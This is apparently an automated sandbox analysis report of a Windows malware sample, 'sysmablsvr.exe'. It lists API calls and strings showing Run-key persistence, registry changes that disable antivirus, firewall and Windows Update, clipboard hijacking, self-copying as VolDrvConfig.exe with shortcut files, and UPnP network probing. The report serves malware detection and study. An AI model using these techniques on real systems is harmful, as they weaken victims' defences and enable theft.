40cdb0 71 API calls 5506->5507 5508 405e6e 5507->5508 5509 405f2b LeaveCriticalSection 5508->5509 5510 405e87 5508->5510 5513 405ea8 5508->5513 5509->5505 5511 405e91 memcpy 5510->5511 5512 405ea6 5510->5512 5511->5512 5514 40a740 _invalid_parameter 3 API calls 5512->5514 5513->5512 5516 405f06 memcpy 5513->5516 5515 405f28 5514->5515 5515->5509 5516->5512 5518 40ba10 13 API calls 
5517->5518 5519 406f65 5518->5519 5519->5489 5521 405f5e 5520->5521 5522 405fea LeaveCriticalSection 5521->5522 5523 40a7b0 8 API calls 5521->5523 5522->5493 5524 405fbc 5523->5524 5524->5522 5526 40a530 _invalid_parameter 7 API calls 5525->5526 5527 406d62 memcpy 5526->5527 5528 40ba10 13 API calls 5527->5528 5529 406dcc 5528->5529 5530 40a740 _invalid_parameter 3 API calls 5529->5530 5531 406d31 5530->5531 5531->5497 5557 40ce10 5532->5557 5535 406243 LeaveCriticalSection 5535->5500 5536 40cdb0 71 API calls 5537 406039 5536->5537 5537->5535 5538 406094 memcpy 5537->5538 5556 406158 5537->5556 5541 40a740 _invalid_parameter 3 API calls 5538->5541 5539 405c90 75 API calls 5542 406181 5539->5542 5540 40a740 _invalid_parameter 3 API calls 5543 4061a2 5540->5543 5544 4060b8 5541->5544 5542->5540 5543->5535 5545 4061b1 CreateFileW 5543->5545 5546 40a7b0 8 API calls 5544->5546 5545->5535 5547 4061d4 5545->5547 5548 4060c8 5546->5548 5551 4061f1 WriteFile 5547->5551 5552 40622f FlushFileBuffers CloseHandle 5547->5552 5549 40a740 _invalid_parameter 3 API calls 5548->5549 5550 4060ef 5549->5550 5553 40c720 7 API calls 5550->5553 5551->5547 5552->5535 5554 406125 5553->5554 5555 4072a0 71 API calls 5554->5555 5555->5556 5556->5539 5556->5542 5560 40c360 5557->5560 5564 40c371 5560->5564 5561 40a7b0 8 API calls 5561->5564 5562 40c38b 5565 40a740 _invalid_parameter 3 API calls 5562->5565 5563 40c2c0 70 API calls 5563->5564 5564->5561 5564->5562 5564->5563 5567 408080 68 API calls 5564->5567 5568 40c3cb memcmp 5564->5568 5566 406022 5565->5566 5566->5535 5566->5536 5567->5564 5568->5562 5568->5564 5569 40d1c0 5574 40d220 5569->5574 5572 40d1ee 5573 40d220 send 5573->5572 5575 40d231 send 5574->5575 5576 40d1d3 5575->5576 5577 40d24e 5575->5577 5576->5572 5576->5573 5577->5575 5577->5576 5797 40db80 5803 401470 5797->5803 5799 40db94 5800 40dba5 WaitForSingleObject 5799->5800 5802 40dbbf 5799->5802 5801 401330 8 API calls 5800->5801 5801->5802 5804 401483 5803->5804 5805 401572 
5803->5805 5804->5805 5806 40a320 7 API calls 5804->5806 5805->5799 5807 401498 CreateEventA socket 5806->5807 5808 4014d5 5807->5808 5809 4014cf 5807->5809 5808->5805 5811 4014e2 htons setsockopt bind 5808->5811 5810 401330 8 API calls 5809->5810 5810->5808 5812 401546 5811->5812 5813 401558 CreateThread 5811->5813 5814 401330 8 API calls 5812->5814 5813->5805 5816 401100 20 API calls _invalid_parameter 5813->5816 5815 40154c 5814->5815 5815->5799 5578 4069c8 5585 40696e 5578->5585 5579 40699e lstrcmpiW 5579->5585 5580 406b19 FindNextFileW 5581 406942 lstrcmpW 5580->5581 5582 406b35 FindClose 5580->5582 5584 406958 lstrcmpW 5581->5584 5581->5585 5587 406b42 5582->5587 5583 406a05 PathMatchSpecW 5583->5585 5588 406a26 wsprintfW SetFileAttributesW DeleteFileW 5583->5588 5584->5585 5585->5579 5585->5580 5585->5583 5586 406a83 PathFileExistsW 5585->5586 5591 406510 11 API calls 5585->5591 5586->5585 5589 406a99 wsprintfW wsprintfW 5586->5589 5588->5585 5589->5585 5590 406b03 MoveFileExW 5589->5590 5590->5580 5591->5585 5592 401f50 GetQueuedCompletionStatus 5593 401f92 5592->5593 5594 402008 5592->5594 5595 401f97 WSAGetOverlappedResult 5593->5595 5599 401d60 5593->5599 5595->5593 5596 401fb9 WSAGetLastError 5595->5596 5596->5593 5598 401fd3 GetQueuedCompletionStatus 5598->5593 5598->5594 5600 401ef2 InterlockedDecrement setsockopt closesocket 5599->5600 5601 401d74 5599->5601 5618 401e39 5600->5618 5601->5600 5602 401d7c 5601->5602 5619 40da30 NtQuerySystemTime RtlTimeToSecondsSince1980 5602->5619 5604 401d81 InterlockedExchange 5605 401d98 5604->5605 5606 401e4e 5604->5606 5611 401da9 InterlockedDecrement 5605->5611 5612 401dbc InterlockedDecrement InterlockedExchangeAdd 5605->5612 5605->5618 5607 401e67 5606->5607 5608 401e57 InterlockedDecrement 5606->5608 5609 401e72 5607->5609 5610 401e87 InterlockedDecrement 5607->5610 5608->5598 5628 401ae0 WSASend 5609->5628 5614 401ee9 5610->5614 5611->5598 5615 401e2f 5612->5615 5614->5598 5620 401cf0 5615->5620 5616 401e7e 
5616->5598 5618->5598 5619->5604 5621 401d00 InterlockedExchangeAdd 5620->5621 5622 401cfc 5620->5622 5623 401d53 5621->5623 5624 401d17 InterlockedIncrement 5621->5624 5622->5618 5623->5618 5634 401c50 WSARecv 5624->5634 5626 401d46 5626->5623 5627 401d4c InterlockedDecrement 5626->5627 5627->5623 5629 401b50 5628->5629 5630 401b12 WSAGetLastError 5628->5630 5629->5616 5630->5629 5631 401b1f 5630->5631 5632 401b56 5631->5632 5633 401b26 Sleep WSASend 5631->5633 5632->5616 5633->5629 5633->5630 5635 401cd2 5634->5635 5636 401c8e 5634->5636 5635->5626 5637 401c90 WSAGetLastError 5636->5637 5638 401ca4 Sleep WSARecv 5636->5638 5639 401cdb 5636->5639 5637->5635 5637->5636 5638->5635 5638->5637 5639->5626 5817 40d490 5823 4021b0 5817->5823 5820 40d4cf 5821 40d4b5 WaitForSingleObject 5827 401600 5821->5827 5824 4021bb 5823->5824 5826 4021cf 5823->5826 5824->5826 5848 402020 5824->5848 5826->5820 5826->5821 5828 401737 5827->5828 5829 40160d 5827->5829 5828->5820 5829->5828 5830 401619 EnterCriticalSection 5829->5830 5831 4016b5 LeaveCriticalSection SetEvent 5830->5831 5836 401630 5830->5836 5832 4016d0 5831->5832 5833 4016e8 5831->5833 5834 4016d6 PostQueuedCompletionStatus 5832->5834 5835 40d860 11 API calls 5833->5835 5834->5833 5834->5834 5838 4016f3 5835->5838 5836->5831 5837 401641 InterlockedDecrement 5836->5837 5839 40165a InterlockedExchangeAdd 5836->5839 5846 4016a0 InterlockedDecrement 5836->5846 5837->5836 5840 40d9a0 7 API calls 5838->5840 5839->5836 5841 40166d InterlockedIncrement 5839->5841 5842 4016fc CloseHandle CloseHandle WSACloseEvent 5840->5842 5843 401c50 4 API calls 5841->5843 5869 40b0d0 shutdown closesocket 5842->5869 5843->5836 5845 401724 DeleteCriticalSection 5847 40a740 _invalid_parameter 3 API calls 5845->5847 5846->5836 5847->5828 5849 40a320 7 API calls 5848->5849 5850 40202b 5849->5850 5851 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5850->5851 5857 4021a5 5850->5857 5852 402076 CreateIoCompletionPort 5851->5852 5853 
40219f 5851->5853 5852->5853 5854 40208f 5852->5854 5855 401600 36 API calls 5853->5855 5856 40d6c0 8 API calls 5854->5856 5855->5857 5858 402094 5856->5858 5857->5826 5858->5853 5859 40209f WSASocketA 5858->5859 5859->5853 5860 4020bd setsockopt htons bind 5859->5860 5860->5853 5861 402126 listen 5860->5861 5861->5853 5862 40213a WSACreateEvent 5861->5862 5862->5853 5863 402147 WSAEventSelect 5862->5863 5863->5853 5867 402159 5863->5867 5864 40217f 5865 40d6f0 17 API calls 5864->5865 5868 402194 5865->5868 5866 40d6f0 17 API calls 5866->5867 5867->5864 5867->5866 5868->5826 5869->5845 5870 405910 GetWindowLongW 5871 405934 5870->5871 5872 405956 5870->5872 5873 405941 5871->5873 5874 4059c7 IsClipboardFormatAvailable 5871->5874 5875 405951 5872->5875 5877 4059a6 5872->5877 5878 40598e SetWindowLongW 5872->5878 5881 405964 SetClipboardViewer SetWindowLongW 5873->5881 5882 405947 5873->5882 5879 4059e3 IsClipboardFormatAvailable 5874->5879 5880 4059da 5874->5880 5876 405b44 DefWindowProcA 5875->5876 5877->5875 5883 4059ac SendMessageA 5877->5883 5878->5875 5879->5880 5884 4059f8 IsClipboardFormatAvailable 5879->5884 5886 405a15 OpenClipboard 5880->5886 5887 405adc 5880->5887 5881->5876 5882->5875 5885 405afd RegisterRawInputDevices ChangeClipboardChain 5882->5885 5883->5875 5884->5880 5885->5876 5886->5887 5889 405a25 GetClipboardData 5886->5889 5887->5875 5888 405ae5 SendMessageA 5887->5888 5888->5875 5889->5875 5890 405a3d GlobalLock 5889->5890 5890->5875 5891 405a55 5890->5891 5892 405a68 5891->5892 5893 405a89 5891->5893 5894 405a9e 5892->5894 5895 405a6e 5892->5895 5896 405630 13 API calls 5893->5896 5911 405750 5894->5911 5897 405a74 GlobalUnlock CloseClipboard 5895->5897 5905 405510 5895->5905 5896->5897 5897->5887 5901 405ac7 5897->5901 5919 4048a0 lstrlenW 5901->5919 5904 40a740 _invalid_parameter 3 API calls 5904->5887 5908 40551b 5905->5908 5906 405521 lstrlenW 5906->5908 5909 405534 5906->5909 5907 40a530 _invalid_parameter 7 API calls 5907->5908 
5908->5906 5908->5907 5908->5909 5910 405551 lstrcpynW 5908->5910 5909->5897 5910->5908 5910->5909 5916 40575d 5911->5916 5912 405763 lstrlenA 5912->5916 5917 405776 5912->5917 5913 4055d0 2 API calls 5913->5916 5914 40a530 _invalid_parameter 7 API calls 5914->5916 5916->5912 5916->5913 5916->5914 5916->5917 5918 40a740 _invalid_parameter 3 API calls 5916->5918 5956 405700 5916->5956 5917->5897 5918->5916 5926 4048d4 5919->5926 5920 404d5e StrStrW 5921 404d71 5920->5921 5922 404d75 StrStrW 5920->5922 5921->5922 5924 404d88 5922->5924 5925 404d8c StrStrW 5922->5925 5923 404ae2 5923->5904 5924->5925 5927 404d9f 5925->5927 5926->5923 5930 404c69 StrStrW 5926->5930 5933 404af4 5926->5933 5927->5923 5928 404e09 isalpha 5927->5928 5936 404e43 5927->5936 5928->5927 5929 404e20 isdigit 5928->5929 5929->5923 5929->5927 5931 404c94 StrStrW 5930->5931 5930->5933 5932 404cbf StrStrW 5931->5932 5931->5933 5932->5933 5933->5920 5933->5923 5934 405351 StrStrW 5939 405364 5934->5939 5940 40536b StrStrW 5934->5940 5935 405303 StrStrW 5937 405316 5935->5937 5938 40531d StrStrW 5935->5938 5936->5934 5936->5935 5937->5938 5941 405330 5938->5941 5942 405337 StrStrW 5938->5942 5939->5940 5943 405385 StrStrW 5940->5943 5944 40537e 5940->5944 5941->5942 5942->5934 5947 40534a 5942->5947 5945 405398 5943->5945 5946 40539f StrStrW 5943->5946 5944->5943 5945->5946 5948 4053b2 5946->5948 5949 4053b9 StrStrW 5946->5949 5947->5934 5948->5949 5950 4053cc lstrlenA 5949->5950 5950->5923 5952 405492 GlobalAlloc 5950->5952 5952->5923 5953 4054ad GlobalLock 5952->5953 5953->5923 5954 4054c0 memcpy GlobalUnlock OpenClipboard 5953->5954 5954->5923 5955 4054ed EmptyClipboard SetClipboardData CloseClipboard 5954->5955 5955->5923 5957 40570b 5956->5957 5958 405711 lstrlenA 5957->5958 5959 4055d0 2 API calls 5957->5959 5960 405744 5957->5960 5958->5957 5959->5957 5960->5916 5640 4080d9 5641 4080e2 5640->5641 5642 4080f1 34 API calls 5641->5642 5643 408f26 5641->5643 5973 405f1d 5975 405eb1 5973->5975 5974 

                                              Control-flow Graph (function starting at 00407500; rendered graph of executed / not executed basic blocks not reproduced)
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 0040750E
                                              • CreateMutexA.KERNELBASE(00000000,00000000,55a4er5wo), ref: 0040751D
                                              • GetLastError.KERNEL32 ref: 00407529
                                              • ExitProcess.KERNEL32 ref: 00407538
                                              • GetModuleFileNameW.KERNEL32(00000000,00417B18,00000105), ref: 00407572
                                              • PathFindFileNameW.SHLWAPI(00417B18), ref: 0040757D
                                              • wsprintfW.USER32 ref: 0040759A
                                              • DeleteFileW.KERNEL32(?), ref: 004075AA
                                              • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 004075C1
                                              • wcscmp.NTDLL ref: 004075D3
                                              • ExitProcess.KERNEL32 ref: 004075F2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                              • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$55a4er5wo$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$DisableWindowsUpdateAccess$DisableWindowsUpdateAccess$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$WindowsUpdate$sysmablsvr.exe
                                              • API String ID: 4172876685-2064808860
                                              • Opcode ID: dacd91aba6d53fbcaf56ddf06e648a3a217ce3490dd00242cf583643d0613e04
                                              • Instruction ID: a49710c48774a039d08af1d560b2319e957ec07716638a9d0d735a0d257e6f0f
                                              • Opcode Fuzzy Hash: dacd91aba6d53fbcaf56ddf06e648a3a217ce3490dd00242cf583643d0613e04
                                              • Instruction Fuzzy Hash: 9B5268B1B80318BBE7209B60DC4AFD93779AB48B11F1085A5F305B91D0DAF5A984CB5D

                                              Control-flow Graph (function starting at 00406650; rendered graph of executed / not executed basic blocks not reproduced)
                                              APIs
                                              • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                              • wsprintfW.USER32 ref: 0040668F
                                              • wsprintfW.USER32 ref: 004066AF
                                              • wsprintfW.USER32 ref: 004066CF
                                              • wsprintfW.USER32 ref: 004066EF
                                              • wsprintfW.USER32 ref: 00406708
                                              • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                              • DeleteFileW.KERNEL32(?), ref: 0040675E
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                              • DeleteFileW.KERNEL32(?), ref: 00406792
                                              • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                              • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                              • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                              • CopyFileW.KERNEL32(00417500,?,00000000), ref: 004067EA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                              • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDrvConfig.exe$%s\*$shell32.dll$shell32.dll
                                              • API String ID: 2120662298-3006713477
                                              • Opcode ID: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction ID: c06ff6b6fb177b83c5a42a6bb152b383d4bd735e421ae8a12f9cadfa06fd6cc4
                                              • Opcode Fuzzy Hash: db5eccb7a8f15aa8004616f5cf87b59d8a7d315b42364bc1ec8f026dd92e313a
                                              • Instruction Fuzzy Hash: A8D164B5900258ABCB20DF50DC54FEA77B8BB48304F04C5EAF20AA6191D7B99BD4CF59

                                              Control-flow Graph (function starting at 00406510; rendered graph of executed / not executed basic blocks not reproduced)
                                              APIs
                                              • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                              • wsprintfW.USER32 ref: 00406535
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                              • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406571
                                              • lstrcmpW.KERNEL32(?,00410FCC), ref: 00406587
                                              • wsprintfW.USER32 ref: 004065AA
                                              • wsprintfW.USER32 ref: 004065CA
                                              • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                              • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                              • FindClose.KERNEL32(000000FF), ref: 0040662F
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                              • String ID: %s\%s$%s\%s$%s\*
                                              • API String ID: 92872011-445461498
                                              • Opcode ID: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction ID: 29a521c4e1aad10613397e171bad1bd73fe874f8ff332ca0de340875b50b0acb
                                              • Opcode Fuzzy Hash: aaf4b3f36bfa67770f4778d47adab31ac8eaf14f3968b868ec32d0f8b28c6d5c
                                              • Instruction Fuzzy Hash: 56315BB5500218AFCB10DB60EC85FDA7778AB48701F40C5A9F609A3185DBB5DAD9CF68
                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                              • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                • Part of subcall function 0040D6C0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D6DE
                                              • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                              • setsockopt.WS2_32 ref: 004020D1
                                              • htons.WS2_32(?), ref: 00402101
                                              • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                              • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                              • WSACreateEvent.WS2_32 ref: 0040213A
                                              • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                • Part of subcall function 0040D6F0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D714
                                                • Part of subcall function 0040D6F0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                                • Part of subcall function 0040D6F0: DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                                • Part of subcall function 0040D6F0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                              • String ID:
                                              • API String ID: 1603358586-0
                                              • Opcode ID: 23dfeb1008158e2e0cd7513cecaa842fef64be5ff76144f1ff25a44a66e0fb2a
                                              • Instruction ID: 5f4ab44496f95361e3b7ac477a06260d9546e6561ad256066a099106afd7ac33
                                              • Opcode Fuzzy Hash: 23dfeb1008158e2e0cd7513cecaa842fef64be5ff76144f1ff25a44a66e0fb2a
                                              • Instruction Fuzzy Hash: 2B41C070640701BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA2D4E7F4E445875A
                                              APIs
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                              • htons.WS2_32(0000076C), ref: 0040DCF0
                                              • inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040B010: htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040B010: socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                                • Part of subcall function 0040B010: connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                                • Part of subcall function 0040B010: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              • bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                              • lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                              • sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                              • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DE20: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                                • Part of subcall function 0040DE20: Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                                • Part of subcall function 0040DE20: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                                • Part of subcall function 0040DE20: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                                • Part of subcall function 0040DE20: StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                              • String ID: 239.255.255.250
                                              • API String ID: 726339449-2186272203
                                              • Opcode ID: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction ID: 4840ad5dfb28dde6295409afe741e8bd11bfa900d245e54f0039e4319b19f377
                                              • Opcode Fuzzy Hash: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction Fuzzy Hash: 7C41D8B4E00208ABDB14DFE4E889BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                              • htons.WS2_32(?), ref: 00401508
                                              • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                              • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                              • String ID:
                                              • API String ID: 4174406920-0
                                              • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                              • Instruction ID: ab17557c7f530dee2ff78f8644a874c55f5dae77ec0fdd8d5eef9b2878869d10
                                              • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                              • Instruction Fuzzy Hash: 6031C871A44301AFE320DF649C46F9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040D292
                                              • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D2B8
                                              • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D2EF
                                              • GetTickCount.KERNEL32 ref: 0040D304
                                              • Sleep.KERNEL32(00000001), ref: 0040D324
                                              • GetTickCount.KERNEL32 ref: 0040D32A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountTick$Sleepioctlsocketrecv
                                              • String ID:
                                              • API String ID: 107502007-0
                                              • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction ID: 4b62ca25e6cdc7f9b2e1b521222d8c0dfc3b1f9d22396e6cb4543525420831ef
                                              • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction Fuzzy Hash: 1F31E874D00209EFCB14DFA8D948AEEB7B0FF44315F108669E825A7290D7749A94CB59
                                              APIs
                                              • htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040AFD0: inet_addr.WS2_32(0040B051), ref: 0040AFDA
                                                • Part of subcall function 0040AFD0: gethostbyname.WS2_32(?), ref: 0040AFED
                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                              • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              Strings
                                              • www.update.microsoft.com, xrefs: 0040B047
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmp
